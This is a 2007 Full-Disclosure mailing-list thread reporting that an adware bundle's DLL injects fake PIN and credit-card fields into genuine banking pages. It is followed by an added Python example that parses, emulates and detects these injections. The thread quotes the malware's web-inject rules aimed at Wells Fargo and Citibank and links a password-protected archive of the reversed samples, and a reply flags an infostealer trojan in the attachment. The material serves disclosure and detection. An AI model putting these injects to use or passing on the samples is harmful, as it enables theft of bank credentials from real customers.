Re: [Full-disclosure] Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..

From: Net Tech (net.tech11gmail.com)
Date: Tue Mar 13 2007 - 12:36:10 CDT


Why is this "genius" sending virus-infected attachments to the list?
The Trojan horse Infostealer.Bancos.Z is attached to his "research data"...
it steals passwords and logs keystrokes entered into certain financial Web
sites.

On 3/12/07, Thierry Zoller <Thierryzoller.lu> wrote:
>
> Dear list,
>
> Whoever deals with these people and thinks they are a benign Adware
> company (and thus spreads their bundles).
>
> Check this :
> Ignoring the fact that they basically install a Rootkit, I attached a
> few files I reversed. They install a DLL that does not directly KEYLOG
> your banking data, but INJECTS HTML CODE into the _genuine_ (SSLed)
> Banking page asking you to enter more details (like PIN, Magic Password
> etc), then captures that data and transmits it (I did no further
> investigation).
>
> http://secdev.zoller.lu/system32.zip
> Pass: 123
>
> I am disgusted. They even created their own XML parser for this ...
>
> An extract of HTML code they inject :
> -------------------------------------
> <inject
> url="wellsfargo"
> before="name=userid autocomplete='off'></DIV>"
> what="
> <DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
> id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin
> autocomplete='off'></SPAN></DIV>
> "
> block="alt=Go"
> check="pin"
> quan="4"
> content="d"
> >
> </inject>
> ------------------------------------
>
> Attached the main files (pass 123), feel free to add this as HIPS or
> whatever
> signatures, those interested in a complete reversal can contact me
> to receive the EXE in question.
>
> I have no more time feel free to dig deeper.
>
>
> I especially liked this :
> ------------------------
> <inject
> url="citibank.com"
> <TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To
> prevent fraud enter your credit card information please:</SPAN></TD></TR>
>
>
> Puke..
>
> --
> http://secdev.zoller.lu
> Thierry Zoller
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
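As an added example (not code from the post, nor from the files Zoller reversed), the `<inject>` rule format quoted above parsed and exercised in Python: a tolerant attribute scanner, because raw HTML inside attribute values is not well-formed XML; an emulation of the splice the rule describes, so an analyst can see the extra field the victim is shown; and a detection check that compares the input names in the page the bank served with those in the DOM the user sees. The rule text, the sample login form, the "`before` is the anchor preceding the insertion" reading and the keyword host match are assumptions constructed for this example.

```python
import re

# Constructed rule in the shape of the extract quoted in the post. The HTML
# payload sits raw inside the attribute value, which is not well-formed XML,
# so a tolerant attribute scanner is used instead of xml.etree.
RULE_TEXT = """<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV>"
block="alt=Go" check="pin" quan="4" content="d"
>
</inject>"""

# Constructed stand-in for the genuine login form the rule anchors on.
GENUINE_HTML = ("<form><DIV><LABEL for=userid>Username</LABEL><INPUT id=userid "
                "type=text name=userid autocomplete='off'></DIV>"
                "<INPUT type=image alt=Go></form>")

ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
INPUT_NAME_RE = re.compile(r"<INPUT\b[^>]*\bname=['\"]?(\w+)", re.I)

def parse_inject_rules(text):
    """Return one dict of attributes per <inject ...></inject> element."""
    bodies = re.findall(r"<inject\b(.*?)>\s*</inject>", text, re.S)
    return [dict(ATTR_RE.findall(body)) for body in bodies]

def rule_applies(rule, host):
    """Assumed semantics: 'url' is a bare keyword matched against the host."""
    return rule["url"].lower() in host.lower()

def simulate_injection(rule, served_html):
    """Emulate the behaviour the post describes: splice 'what' into the page
    right after the 'before' anchor (assumed semantics). Returns the page as
    the victim's browser would show it, unchanged if the anchor is absent."""
    anchor = rule["before"]
    idx = served_html.find(anchor)
    if idx < 0:
        return served_html
    cut = idx + len(anchor)
    return served_html[:cut] + rule["what"] + served_html[cut:]

def injected_fields(served_html, rendered_html):
    """Detection check: input names present in the DOM the user sees but
    absent from the HTML the bank actually served over TLS."""
    served = set(INPUT_NAME_RE.findall(served_html))
    rendered = set(INPUT_NAME_RE.findall(rendered_html))
    return sorted(rendered - served)
```

The same served-versus-rendered comparison is what a browser-side integrity check or a proxy that logs the TLS-decrypted response would run to flag fields a DLL added after the page left the bank.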